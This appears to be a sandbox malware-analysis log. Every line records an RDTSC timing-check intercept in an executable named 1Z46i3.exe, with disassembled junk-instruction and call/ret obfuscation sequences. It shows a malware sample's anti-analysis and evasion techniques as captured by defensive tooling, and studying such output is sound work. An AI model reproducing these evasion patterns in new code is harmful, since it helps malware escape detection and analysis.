Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F84C45 second address: F84C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4E3C536586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F84C51 second address: F84C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF48098h 0x00000009 popad 0x0000000a push ecx 0x0000000b push edi 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F851D1 second address: F851E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E3C536586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007F4E3C53658Eh 0x00000010 jbe 00007F4E3C536586h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F851E9 second address: F85226 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jo 00007F4E3CF48086h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pop edx 0x0000001a pushad 0x0000001b jnc 00007F4E3CF48086h 0x00000021 jbe 00007F4E3CF48086h 0x00000027 jmp 00007F4E3CF48095h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F85902 second address: F85908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F85908 second address: F8590C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8590C second address: F85955 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F4E3C53658Eh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 jp 00007F4E3C536586h 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b jno 00007F4E3C536586h 0x00000021 pushad 0x00000022 popad 0x00000023 push esi 0x00000024 pop esi 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 jnl 00007F4E3C536588h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4E3C53658Fh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F79E9C second address: F79EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F79EA2 second address: F79EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F79EAF second address: F79EE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48096h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4E3CF48097h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F50E89 second address: F50EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536594h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F50EA1 second address: F50EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F85D2E second address: F85D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F85D34 second address: F85D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F866E5 second address: F866E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F866E9 second address: F86712 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4E3CF48086h 0x00000008 jmp 00007F4E3CF48099h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F86712 second address: F8671D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F86A12 second address: F86A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF48094h 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b jnp 00007F4E3CF48090h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8911F second address: F89123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8BFC1 second address: F8BFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8C5EA second address: F8C604 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4E3C536588h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jnp 00007F4E3C536586h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8C604 second address: F8C638 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a ja 00007F4E3CF480A1h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8C638 second address: F8C63C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8C837 second address: F8C83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F8FDCE second address: F8FDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F4E3C536586h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92E6F second address: F92E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92E73 second address: F92E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92E79 second address: F92E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F4E3CF48086h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92E89 second address: F92E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92E8D second address: F92EB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4E3CF48090h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92EB2 second address: F92ECB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Bh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F4E3C536588h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F92ECB second address: F92ED4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F93330 second address: F9334D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jmp 00007F4E3C536592h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F935F8 second address: F9360F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnl 00007F4E3CF48092h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9360F second address: F93614 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F93614 second address: F93636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF48099h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F93636 second address: F9363A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F937BE second address: F937C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F937C2 second address: F937EE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4E3C536586h 0x00000008 jmp 00007F4E3C536598h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 jo 00007F4E3C536586h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F937EE second address: F9380E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F93991 second address: F939A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Ah 0x00000007 jo 00007F4E3C53658Eh 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F939A7 second address: F939B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F939B2 second address: F939C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F4E3C53658Eh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97170 second address: F9718D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jnp 00007F4E3CF4809Ah 0x0000000e pushad 0x0000000f jmp 00007F4E3CF4808Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97302 second address: F9731F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E3C536599h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9731F second address: F97323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F976DD second address: F976E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97D05 second address: F97D1D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jnc 00007F4E3CF48086h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97D1D second address: F97D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97D21 second address: F97D31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F97FCF second address: F97FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4E3C536586h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F982A4 second address: F982AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F982AA second address: F982B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F98308 second address: F98363 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E3CF48086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4E3CF48093h 0x0000000f popad 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F4E3CF48088h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b jnl 00007F4E3CF48089h 0x00000031 push edi 0x00000032 jmp 00007F4E3CF4808Eh 0x00000037 pop esi 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c push ebx 0x0000003d pop ebx 0x0000003e pop ecx 0x0000003f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F98363 second address: F98383 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4E3C536588h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007F4E3C53658Bh 0x00000012 pop ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F99022 second address: F99028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F99028 second address: F9902C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9AB4F second address: F9AB64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9AB64 second address: F9AB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9AB68 second address: F9ABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F4E3CF48088h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F4E3CF48088h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F4E3CF48088h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 00000014h 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov di, 5F04h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F4E3CF4808Eh 0x00000066 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C58D second address: F9C5B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536599h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C5B0 second address: F9C5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C5B4 second address: F9C5CB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4E3C536586h 0x00000008 jmp 00007F4E3C53658Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C5CB second address: F9C5E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF4808Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C5E0 second address: F9C5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C536596h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9C5FA second address: F9C5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9D6D5 second address: F9D6D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9D6D9 second address: F9D6DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9D6DF second address: F9D6E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9ECFD second address: F9ED03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9F5BA second address: F9F5BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA172D second address: FA17A7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4E3CF48092h 0x00000008 jmp 00007F4E3CF4808Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F4E3CF48088h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c and edi, 7BF4BDC7h 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D2BD6h] 0x0000003a mov edi, 21181DDFh 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push esi 0x00000044 call 00007F4E3CF48088h 0x00000049 pop esi 0x0000004a mov dword ptr [esp+04h], esi 0x0000004e add dword ptr [esp+04h], 00000016h 0x00000056 inc esi 0x00000057 push esi 0x00000058 ret 0x00000059 pop esi 0x0000005a ret 0x0000005b adc bh, 00000000h 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push esi 0x00000062 pushad 0x00000063 popad 0x00000064 pop esi 0x00000065 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9F5BE second address: F9F5CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F4E3C536586h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA27F3 second address: FA2871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F4E3CF48088h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov di, A58Ch 0x00000027 push 00000000h 0x00000029 mov di, 0700h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edi 0x00000032 call 00007F4E3CF48088h 0x00000037 pop edi 0x00000038 mov dword ptr [esp+04h], edi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc edi 0x00000045 push edi 0x00000046 ret 0x00000047 pop edi 0x00000048 ret 0x00000049 jmp 00007F4E3CF48098h 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F4E3CF48090h 0x00000056 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA3A1A second address: FA3A1F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA3A1F second address: FA3A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4E3CF48096h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA3A3F second address: FA3A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
